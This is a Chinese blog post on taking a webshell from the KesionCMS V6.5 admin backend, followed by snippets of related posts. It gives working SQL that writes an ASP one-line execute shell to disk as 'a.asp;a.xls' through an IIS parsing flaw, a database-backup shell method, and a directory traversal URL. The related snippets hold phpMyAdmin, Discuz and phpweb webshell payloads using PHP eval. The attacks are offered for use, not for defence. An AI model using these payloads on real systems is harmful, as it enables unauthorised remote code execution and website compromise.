KesionCMS V6.5后台拿SHELL方法

Title:KesionCMS V6.5后台拿SHELL方法  --2011-03-29 00:21

最近弄一个站点,是KesionCMS V6.5的WEB系统,试了下后台拿webshell方法,记下来.

1.

新建x.asp用户再结合IIS的文件夹解析漏洞,是可以拿到SHELL的,前提是没有禁止.asp目录的访问,我弄的目标站,不允许访问.asp这样的目录下面的文件的.

2.

后台SQL执行导出webshell

理论上是可以的,我在本地可以导出ok.asp;o.xls这样的文件的。但是TXT文件的话,";"会被替换成"_".也就不起作用了。

create table cmd (a varchar(50))

insert into cmd (a) values (‘┼攠數畣整爠煥敵瑳∨∣┩愾‘)

OR

insert into cmd (a) values (‘<%execute request("a")%>‘)

select * into [a] in ‘d:\wwwroot\a.asp;a.xls‘ ‘excel 8.0;‘ from cmd

导出去以后,IIS需要重启一次。WEB才没有挂掉。但是我第一次导出的时候,并没有挂。

导出去以后同目录下面还会生成一个INI的文件。

3.

数据库插马,然后备份SHELL

选择KS_Collect.Mdb数据库,因为数据量小些,方便。

当然也可以把主数据库的NOTDOWN里面的数据UPDATA成一句话备份。

create table C:\wwwroot\KS_Data\Collect\KS_Collect.Mdb.cmd  (a varchar(50))

insert into C:\wwwroot\KS_Data\Collect\KS_Collect.Mdb.cmd  (a) values (‘┼攠數畣整爠煥敵瑳∨∣┩愾‘)//此处一点要弄编码,不要有杂的符号.

然后去备份成ASP页面的文件,就可以了,有时候不成功的话,插马的语句选择是关键。

drop table C:\wwwroot\KS_Data\Collect\KS_Collect.Mdb.cmd


系统还有其他地方有安全隐患的地方。

如跨目录浏览http://www.xxx.org/admin/KS.AdminFiles.asp?UploadDir=../..

在后台管理的登录界面,可以猜测管理员账号,密码,管理认证码,都是单独报错误的。

ANSI2Unicode

时间: 2024-11-07 11:00:45

KesionCMS V6.5后台拿SHELL方法的相关文章

phpmyadmin后台拿shell方法总结

方法一:CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');SELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';----以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xiaoma1

discuz6.1两种方法后台拿shell

discuz6.1两种方法后台拿shell好多朋友说discuz6.1后台不会拿shell,在前段时间这些都是说不公布的东西,我发出来给大家测试一下1:http://127.0.0.1/discuz/admincp.php?action=runwizard&frames=yesadmincp.php?action=runwizard&frames=yes点击下一步然后再论坛名称的地方插入webshell<?php eval($_POST[cmd]);?>后台webshell地址

关于phpweb后台拿shell简单方法。

首先登录后台admin.php 登录后台管理系统后,然后把下面的文件保存为xxx.html,修改action,把 www.xxx.com 改成你的目标网站地址. 代码文件如下: <form name="uploadForm" method="post" enctype="multipart/form-data" action="http://www.xxx.com/kedit/upload_cgi/upload.php"

linux系统ecshop拿shell方法

Title:linux系统ecshop拿shell方法  --2011-06-08 13:23 最近弄一个站,对ECSHOP拿shell不了解,导致走了很多的弯路. nginx/0.8.54的服务器,magic_quotes_gpc开启转义,很多的页面被删除了. 后台有or漏洞,用户"' or 1=1 #"密码随便填. 开始我也不知道,了解得少. 网站的myship.php访问无果,但是库项目管理模版可以编辑,找不到文件路径未果,因为用的是nginx/0.8.54,解析漏洞被修补. 很

网站后台getshell的方法总结

网站后台getshell的方法总结 方法一:直接上传getshell 以dedecms为例,后台可以直接上传脚本文件,从而getshell,具体方法如下: 即可成功上传大马,并成功执行,从而拿下webshell. 坑:通常由于权限限制,导致只有该目录权限,无法进入其他目录,此时便可以采用../跳转到根目录,或者其他目录,此时所采用的方法是如下的文件改名 方法二:数据库备份getshell 以南方数据cms为例: 1,首先上传一张图片马上去,并且获取图片马的路径 2,在系统管理处选择数据库备份,进

ajax如何调用后台定义的方法

ajax如何调用后台定义的方法:由于ajax的独特优势,使得它在当前大量网站得到了广泛的应用,下面就介绍一下ajax如何调用后台定义的函数,虽然比较简单,不过希望能够给初学者带来一定的帮助,代码如下:1.首先我们先创建一个antzone.aspx页面.2.在它的cs文件中创建如下函数: public static string mytest(string first, string second) { return return first+second; } 2.html代码如下: <form

iOS AVPlayer 后台播放问题自动停止问题 防止应用被后台挂起方法

iOS AVPlayer 后台播放问题自动停止问题 防止应用被后台挂起方法 2016-09-08 16:16 1597人阅读 评论(0) 收藏 举报  分类: iOS 开发笔记(37)  版权声明:本文为博主原创文章,未经博主允许不得转载. 目录(?)[+] 1.创建播放器时创建AVAudioSession [objc] view plain copy AVAudioSession *session = [AVAudioSessionsharedInstance]; [session setCa

在phpmyadmin后台获取webshell方法汇总整理

方法一: CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL ); INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>'); SELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php'; ----以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xia

利用SQL注入漏洞登录后台的实现方法

利用SQL注入漏洞登录后台的实现方法 作者: 字体:[增加 减小] 类型:转载 时间:2012-01-12我要评论 工作需要,得好好补习下关于WEB安全方面的相关知识,故撰此文,权当总结,别无它意.读这篇文章,我假设读者有过写SQL语句的经历,或者能看得懂SQL语句 早在02年,国外关于SQL注入漏洞的技术文章已经很多,而国内在05年左右才开始的.  如今,谈SQL注入漏洞是否已是明日黄花,国内大大小小的网站都已经补上漏洞.但,百密必有一疏,入侵是偶然的,但安全绝对不是必然的.  前些天,网上传